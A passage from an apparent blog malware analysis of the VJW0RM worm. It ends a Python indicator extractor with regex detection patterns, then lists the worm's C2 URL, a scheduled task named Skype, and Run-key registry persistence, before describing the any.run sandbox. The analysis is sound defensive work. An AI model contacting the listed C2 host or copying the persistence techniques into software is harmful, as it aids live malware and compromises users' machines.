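    """Indicators that only become greppable once the constants are resolved."""
    return {
        "urls": sorted(set(re.findall(r'https?://[^\s"&,]+', resolved))),
        "scheduled_tasks": re.findall(r'schtasks\s+/create\b[^"\n]*?/tn\s+(\S+)', resolved, re.I),
        "registry_writes": re.findall(r'\bregwrite\s+"([^"]+)"', resolved, re.I),
        "registry_reads": re.findall(r'\bregread\("([^"]+)"\)', resolved, re.I),
    }


def analyse(src: str) -> dict:
    """Resolve a decoded script and return its indicators."""
    return extract_iocs(resolve_constants(src))


if __name__ == "__main__":
    for name, values in analyse(EXCERPT).items():
        print(name, values)
```

On the excerpt this yields the C2 URL http://houstriko.dynu.net:7754/, the task name Skype, and the two registry keys HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ZTUK0MZ2SU and HKCU\vw0rm. Those four strings, plus the script copy in %AppData% and the Startup folder, are what to look for on the client’s other machines.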
Curious about the origin of the malware, I googled the URL the POST request is sent to and the malware coder’s name, which led me to his Twitter, Instagram and YouTube accounts and to a bunch of malware analyses on any.run, an interesting website:

What is any.run?

any.run is an interactive online sandbox: it gives you a disposable virtual machine in which you can detonate a sample and interact with it, without any risk to your own hosts. Unlike a plain virtual machine, it also records every change the sample makes to the guest (process tree, file and registry writes, network connections), so a worm like this one shows its persistence and its C2 beacons right away. One caveat: tasks submitted on the free plan are public, so anyone, including the malware’s author, can see what you uploaded:
Caught requests from VJW0RM malware

I am really happy to have found the any.run website, as I deal with malware daily. It will allow me to execute samples and see what happens safely, and so learn how they work.
© suiramdev. All rights reserved.